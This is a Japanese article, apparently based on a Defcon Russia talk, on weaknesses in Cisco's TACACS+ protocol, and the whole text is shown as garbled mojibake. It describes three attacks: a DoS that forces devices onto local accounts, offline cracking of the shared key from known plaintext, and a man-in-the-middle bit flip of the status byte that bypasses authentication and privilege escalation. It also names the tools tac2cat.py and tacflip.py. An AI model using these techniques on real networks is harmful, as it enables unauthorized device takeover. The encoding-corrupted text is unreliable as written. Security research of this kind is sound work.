TACACS +ãšã¯
ã¿ãŒããã«ã¢ã¯ã»ã¹ã³ã³ãããŒã©Access-Control System PlusïŒTACACS +ïŒã¯ãAAAïŒèªèšŒãèš±å¯ãã¢ã«ãŠã³ãã£ã³ã°ïŒçšã®ã·ã¹ã³ã®ç¹å¥ãªãããã³ã«ã§ãã ã€ãŸããéäžåã¢ã¯ã»ã¹å¶åŸ¡ã®ãããã³ã«ã§ããã»ãšãã©ã®å Žåãã¢ã¯ã»ã¹ã¯ã·ã¹ã³ãžã®ã¢ã¯ã»ã¹ã§ãããä»ã®äœããå°ç¡ãã«ããããšãã§ããŸãã
ãã®ãããéåžžãTACACS +ãµãŒãã¹ãåãã1ã€ãŸãã¯2ã€ã®ãµãŒããŒããTCPãããã³ã«ã®ããŒã49ãããã³ãã®äœ¿çšãæ§æãããã¹ãŠã®ããã€ã¹ã§ç«ã¡äžãããŸãã ãããã£ãŠããŠãŒã¶ãŒãã¹ã€ãããã«ãŒã¿ãŒããŸãã¯ãã®ä»ã®ããã€ã¹ã§èªèšŒããå Žåãããã€ã¹ã¯èªèšŒããŒã¿ãTACACS +ãµãŒããŒã«éä¿¡ããããã§æ€èšŒãããå¿çãã±ããã§å ±åãããã¢ã¯ã»ã¹èš±å¯ã«é¢ãã決å®ãè¡ãããŸãã

䟿å©ã§éäžç®¡çã ããŸããŸãªããã€ã¹ã®ããŸããŸãªãŠãŒã¶ãŒã«ããŸããŸãªç¹æš©ãèšå®ã§ããŸãã ãµãŒããŒåŽã§ã¢ã¯ã»ã¹ãšã¢ã¯ã·ã§ã³ã®ãã°ãèšé²ãããŸãã ADãLDAPãªã©ãå¥ã®ã¢ã¯ã»ã¹ã®éäžåã®äžã«ãã蟌ãããšãã§ããŸãã ãªãŒãã³ãœãŒã¹ãµãŒããŒã®å®è£ ããããŸãïŒã·ã¹ã³ã¯ãã€ãŠå ¬åŒã«ã³ãŒããæçš¿ããŸããïŒã
æ»æçªå·1
æåã®ãæ»æãã¯æ¬æ Œçãªæ»æãããããªãã¯ã®ããã«èŠããŸãããç¹å®ã®ç¶æ³ã§åœ¹ç«ã€å ŽåããããŸãã
ãããã£ãŠããã³ãã¹ãäžã«tsiskaããèšå®ãåãåã£ããšããŸãããïŒããšãã°ãTFTPãµãŒããŒããååŸããŸãïŒã ãã¡ããããã¯è¯ãããšã§ãããããã€ã¹ããããŒã«ã«ã¢ã«ãŠã³ãã«æ£åžžã«ãã€ã€ã«ã€ã³ããŠããããã€ã¹ã¯TACACS +ãµãŒããŒã®ã¢ã«ãŠã³ãããã§ãã¯ããããããã°ã€ã³ã§ããŸããã
ãã ããããã§ã¯ãTACACS +ã«æ¥ç¶ãããšãã®äžè¬çãªæ§æãæãåºããŠãã ããã
TACACS +ãµãŒããŒã§äœããçºçããCiscoããã€ã¹ã§äœ¿çšã§ããªããã管çè ã¯ããã€ã¹ã«ãã°ã€ã³ããå¿ èŠããããããããŸãããããããå®è¡ã§ããªããšæ³åããŠãã ããã ãã®ãããªç®çã®ããã«ãã·ã¹ã³ããã€ã¹ã¯ããŸããŸãªãã¿ã€ããã®èªèšŒããµããŒãããŸãã管çè ã¯æ§æäžã«æå®ããå¿ èŠããããŸãã
ãããã£ãŠãTACACS +ã䜿çšããCiscoã®åŸæ¥ã®èªèšŒèšå®ã¯æ¬¡ã®ãšããã§ãã
aaa authentication login default group tacacs+ local
ããã§ãæåŸã®2ã€ã®åèªã¯éèŠã§ããããã¯ãTACACS +ã䜿çšããŠæåã®èªèšŒãæ€èšŒãã次ã«ããŒã«ã«ãŠãŒã¶ãŒããŒã¿ããŒã¹ãæ€çŽ¢ããããšã瀺ããŠããŸãã ããã«ãTACACS +ã§ãŠãŒã¶ãŒãèŠã€ãããªãå ŽåãããŒã«ã«ã§ãã§ãã¯ãããŸããã
æåã®æ»æã®æ¬è³ªã¯ãæ»æè ãšããŠTACACS + DoSãµãŒããŒã§ããããã®åŸãããŒã«ã«ã¢ã«ãŠã³ãã£ã³ã°ã䜿çšããŠç®çã®ã·ã¹ã³ããã€ã¹ã«æ¥ç¶ããããšã§ãã ãããŠãDoSã¯ããåºãæå³ã§ã®æå³ã§ã-ç¹å¥ãªãã±ããïŒèŠã€ãã£ãå ŽåïŒãšå€æ°ã®TCPæ¥ç¶ãéä¿¡ã§ããŸã...

æ»æ2ããã³3ã®çŽ¹ä»
æ»æ2ããã³3ã«é²ãåã«ãTACACS +ãããã³ã«ã«ã€ããŠäœãä»ã®ããšãåŠã¶å¿ èŠããããŸãã ãããã³ã«ã®ããŒã¿ã¯ãã¬ãŒã³ããã¹ãã§éä¿¡ãããããæå·åãæå¹ã«ããããšãã§ããŸãã PSKïŒPre-Shared KeyïŒã«åºã¥ããŠç·šæãããŠããŸãã 管çè èªèº«ããTACACS +ãµãŒããŒãšããã«æ¥ç¶ãããŠãããã¹ãŠã®ã¯ã©ã€ã¢ã³ãïŒããã€ã¹ïŒã®1ã€ã®ããŒããã€ã³ãããŸãã ããã«ããŠãŒã¶ãŒããŒã¿ã®ã¿ãæå·åãããTACACS +ããããŒã¯æå·åãããŸããã ç§ã®ç¥ãéããæå·åèªäœã¯æ¬¡ã®ãšããã§ãã
æå·åãããããŒã¿ïŒenc_dataïŒã¯ãããŒã¿ïŒdataïŒãšç¹å¥ãªæåå-pseudo_padãšã®XORæäœã®çµæã§ãã
data^pseudo_pad=enc_data
pseudo_padã¯ãMD5ããã·ã¥ã®ã·ãŒã±ã³ã¹ã§ãã
pseudo_pad = {MD5_1 [,MD5_2 [ ... ,MD5_n]]}
MD5ããã·ã¥ã¯ãTACACS +ãã±ããã®ããããŒããã®ããŒã¿ãå ±æããŒïŒPSKïŒãããã³ä»¥åã®ããã·ã¥ïŒæåã®MD5ã®å ŽåããªãïŒã«åºã¥ããŠäœæãããŸãã ããªãã¡ïŒ
MD5_1 = MD5{session_id, key, version, seq_no} MD5_2 = MD5{session_id, key, version, seq_no, MD5_1} .... MD5_n = MD5{session_id, key, version, seq_no, MD5_n-1}
ããã§ãsession_idã¯ã©ã³ãã ã»ãã·ã§ã³èå¥åã§ãã version-ãããã³ã«ããŒãžã§ã³ã seq_no-å¢åãã±ããçªå·ã ããŒ-PSKã

ãããŠãããŒã¿ã¯æå·åãããŠããããã§ã...
æ»æçªå·2
ããã§ã¯ãã¿ã¹ã¯ãæå®ããŠç¶æ³ãæ確ã«ããŸãããã ã·ã¹ã³ããã€ã¹ãšTACACS +ãµãŒããŒããããŸãã ãããŠãæå·åãããTACACS +ãã©ãã£ãã¯ããããã®éã§ååŸã§ããŸãïŒããšãã°ãäžéè ã䜿çšããŠïŒã ç§ãã¡ã®ç®æšã¯ãPSKãååŸããããã䜿çšããŠãã©ãã£ãã¯ã解èªããæå¹ãªã¢ã«ãŠã³ããååŸããããšã§ãã
ã§ã¯ãäœãã§ãããèŠãŠã¿ãŸãããã ãŸããMD5ã®å€ã¯è€æ°ã®å€ããäœæãããŸããããã®ãã¡ã®1ã€ïŒå ±éããŒïŒã ãã¯ç¥ããŸããããæ®ãã¯ãã¹ãŠTACACS +ããã±ãŒãžã®ããããŒããååŸã§ããŸãã ãããã£ãŠãã¿ã¹ã¯ãåçŽåãããšãããŒãèŠã€ããããšããããšã«ãªããŸãïŒããããªãå Žåã¯:)ïŒã åæã«ãMD5ã¯éåžžã«è¿ éã«ãªãã©ã€ã³ã§ãã©ãã·ã³ã°ã§ããŸãã ãã ãããã®ããã«ã¯å€MD5_1ãååŸããå¿ èŠããããŸãã
次ã«ãXORã¯å¯éæäœã§ããããšãèŠããŠããå¿ èŠããããŸãã ã€ãŸã ãdata ^ pseudo_pad = enc_dataããšããæäœããã£ãå Žåããpseudo_pad = data ^ enc_dataããšãªããŸãã åæã«ãXORã¯æãåçŽãªæäœã§ãããè¡ã®äžéšãå€æŽããŠããè¡ã®å¥ã®éšåãå€æŽããå¿ èŠã¯ãããŸããã MD5_1ãååŸããŸã-ããã¯pseudo_padã®æåã®éšåã§ãã å ·äœçã«ã¯ã128ããããŸãã¯16ãã€ãã ãããã£ãŠãMD5_1ãååŸããã«ã¯ãæå·åãããããŒã¿ã®æåã®16ãã€ããšå ã®ããŒã¿ã®16ãã€ããç¥ãå¿ èŠããããŸãã ãã©ãã£ãã¯ããä»»æã®éã®ããŒã¿ãæå·åããå Žåãå ã®ããŒã¿ã®16ãã€ããååŸããã«ã¯ã©ãããã°ããã§ããïŒ
泚æããããšãéèŠã§ãïŒèŠæ±ãšå¿çãããã³ãããã®ããŸããŸãªã¿ã€ãã®åœ¢åŒã¯ç°ãªããŸãïŒTACACS +ã¯AAA-èªèšŒãæ¿èªãã¢ã«ãŠã³ãã£ã³ã°ã§ããããšãèŠããŠããå¿ èŠããããŸãïŒã
ãããããããã«ã¯ãŸã å ±éã®ãã¿ãŒã³ããããŸã-æåã®16ãã€ãã«ã©ã³ãã ãªå€ãæªç¥ã®å€ã¯ã»ãšãã©ãããŸããã
詳现ã«ã¯è§Šãããæã䟿å©ãªäŸã瀺ããŸãã ããã¯ãTACACS +ãµãŒããŒããã®æåã®å¿çã§ãã åäžã®å€ãæã€è€æ°ã®ãã£ãŒã«ããšããŠãŒã¶ãŒçšã®ã·ã¹ã³ããã€ã¹ããã®ãŠã§ã«ã«ã ã©ã€ã³ãå«ãŸããŠããŸãã ãŸããæ¥ç¶æã«ãŠã§ã«ã«ã ã©ã€ã³ãååŸã§ããããããã¹ãŠã®å€ã確å®ã«ç¥ã£ãŠããããšãããããŸãã

ãããã£ãŠãæå·åãããŠããªãããŒã¿ããã±ããã«å«ãŸããŠããããšãã»ãŒæ£ç¢ºã«ææ¡ããŠãããããMD5_1ãååŸããŠããŒã«ã«ã§ãã«ãŒãããããšãã§ããŸãã æåããå Žåããã©ãã£ãã¯ãå®å šã«åŸ©å·åã§ããŸãã
ããã±ãŒãžã解æããŠMD5_1ã匷調衚瀺ããã¿ã¹ã¯ãç°¡çŽ åããããã«ãããŒã«ããã¯ã¹tac2cat.pyãã¹ã±ããããŸããïŒTacoTacoãããžã§ã¯ãã®äžéšãšããŠã以äžãåç §ïŒ

æ»æçªå·3
CC'2015ã§ã®æè¿ã®Defcon Russiaã®äŒè°ã§ãããã2ã€ã®æ»æã«ã€ããŠè©±ããŸããã ãããŠãç§ãã¡ã®ã°ã«ãŒãã®è¯ãäŒçµ±ã®äžã§ãè°è«ã®äžã§ç§ã¯ããã€ãã®å®è·µçãªã¢ããã€ã¹ãåããŸããã ãããã®1ã€ã¯ããããå転ã®å¯èœæ§ã«ç®ãåããããšã§ãã
ããã§ãæåŸã®æ»æã®ã·ããªãªã ã·ã¹ã³ããã€ã¹ãšTACACS +ãµãŒããŒããããŸãã ã¢ã¯ãã£ããªäžéè æ»æãå®è¡ã§ããŸãïŒã€ãŸãããã©ãã£ãã¯ãå€æŽã§ããŸãïŒã ç®æšã¯ããã¹ãŠãå£ããããšã§ã
ãããã³ã«ã詳ããèŠããšãããã«2ã€ã®éèŠãªæ©èœãç»å ŽããŸããã 1ã€ç®ã¯ããããã³ã«ã«æŽåæ§ãã§ãã¯ããªãããšã§ãã ã€ãŸã æå·åããããã©ãã£ãã¯ã®å€ãå€æŽããå Žåãããã¯åŸ©å·åããããã©ãã£ãã¯ïŒXORïŒã«åœ±é¿ãããµãŒããŒã¯å€æŽãèªèããã«ãé£ã¹ããŸãã
2çªç®ã®æ©èœã¯ãã±ãã圢åŒã§ããã èªèšŒãã±ãããšèš±å¯ã®äž¡æ¹ã«ã€ããŠãèš±å¯ãèŠæ±ããå Žåãã¡ã€ã³å¿çã¯å¿çã®æåã®ãã€ãã§éä¿¡ãããŸãã ããšãã°ã0x01-èªèšŒã¯æåãã0x02-æåããŸããã

åèšã§ã1ãã€ãã ãå€æŽããå¿ èŠããããŸãïŒ æãåçŽãªåœ¢åŒã§ã¯ã次ã®ããšãè¡ãå¿ èŠããããŸãã
- ãã®ãã€ããXOR'næå·åãã€ããããã³æ¢ç¥ã®å€ã®pseudo_padãååŸããŸãïŒèªèšŒäžã«èª€ã£ãããŒã¿ãå ¥åãããšãèªèšŒãæåŠãããããšãããããŸã-ã€ãŸããå€ã¯0x02ã«ãªããŸãïŒ
- èªèšŒãã€ãïŒ0x01ïŒã§ãã®ãã€ããå床XOR'n pseudo_padããŸã
- æå·åããããã©ãã£ãã¯ã®ãã®ãã€ããå€æŽããŸãã
ãããã£ãŠãMitMæ»æã§ã¯ãæ¿èªãŸãã¯èªèšŒã®ããã®äžæ£ãªããŒã¿ã«å¯Ÿããèš±å¯ãäžããŸãã ããã«ãåãæ¹æ³ã§ãã·ã¹ã³ããã€ã¹ã§ã®æš©éææ Œã®èªèšŒããã€ãã¹ããŸãïŒãã¹ã¯ãŒããæå¹ã«ããŸãïŒã
ãã®çµæããã®æ»æãå®è£ ããããã«ãããŒã«ãäœæãããŸãã-tacflip.pyïŒTacoTacoãããžã§ã¯ãã®äžéšãšããŠïŒ
GNS3ã®7200-tsiskaããã³TACACS +ãµãŒããŒã®ãªãŒãã³ãœãŒã¹å®è£ -tac_plusã䜿çšããæäœïŒèªèšŒãšæ¿èªã®ãã€ãã¹ïŒãæ€èšŒãããŸãã
TACACS +èšå®ã®äžéšã¯æ¬¡ã®ãšããã§ãã
aaa authentication login default group tacacs+ local aaa authentication enable default group tacacs+ aaa authorization exec default group tacacs+ local tacacs-server host 192.168.182.136 tacacs-server directed-request tacacs-server key 12345
ãããŠãããã«ãããã€ã¹ã®å ¥åãæš©éã®ææ Œãã³ãã³ãã®å®è¡ã«é¢ããå°ããªãã¢ãããªããããŸãã
ç¶æ³...
2000幎ã«ãSolar Designerã¯goo.gl/E2IGnkãããã³ã«ã®èå³æ·±ãèŠçŽãäœæããŸããã ããšãã°ããªãã¬ã€æ»æã®å¯èœæ§ããŸãã¯ãŠãŒã¶ãŒã®ãã¹ã¯ãŒãã®é·ãã®é瀺ïŒããã£ã³ã°ããªãããïŒãããã³äœãä»ã®ãã®ïŒãããããªããã³ã°ïŒãçºèŠãããŸããã ããããç§ã¯åœŒãã®å®çšçãªå®è£ ãå ¬å ±ã§èŠã€ããããŸããã§ãã...ãããããã®ãããã³ã«ã®ç§ã®ãã¬ãã¥ãŒãã¯ãé·æã«ããããããã³ã«ãšã®ã©ã³ãã ãªçžäºäœçšã®ãªã¹ãã«éãããçŠç¹ãçµã£ãç 究ã§ã¯ãããŸããã äœã®ããã«ãSolar Designerã®çµæãå¿ããŠãäœããåéããŸããã
ããããç§ã®ä»äºã®äž»ãªçµæã¯ãäœæ¥ããŒã«ïŒãããŸã§ã®ãšããããŒã¿çïŒã§ãã
TacoTacoãããžã§ã¯ãã®çŽ¹ä»github.com/GrrrDog/TacoTaco
åèšïŒ
ãããããTACACS +ãããã³ã«ãšãã®å®è£ ã¯ãMitMæ»æã«å¯Ÿããå¿ èŠãªã¬ãã«ã®ä¿è·ãæäŸããªããšèããããšãã§ããŸãã
äžæ¹ãå€ãã®å ŽåãTACACS +ãµãŒããŒã¯ç®¡çè ãšãããã¯ãŒã¯æ©åšã®ã¿ãã¢ã¯ã»ã¹ã§ããVLANã«é 眮ãããŠããããããããã®æ»æã¯ããå°é£ã§ãïŒã·ã¹ã³ããã®åæ§ã®æšå¥šäºé ïŒã ããããããã¯å¥ã®ã¿ã¹ã¯ã§ãã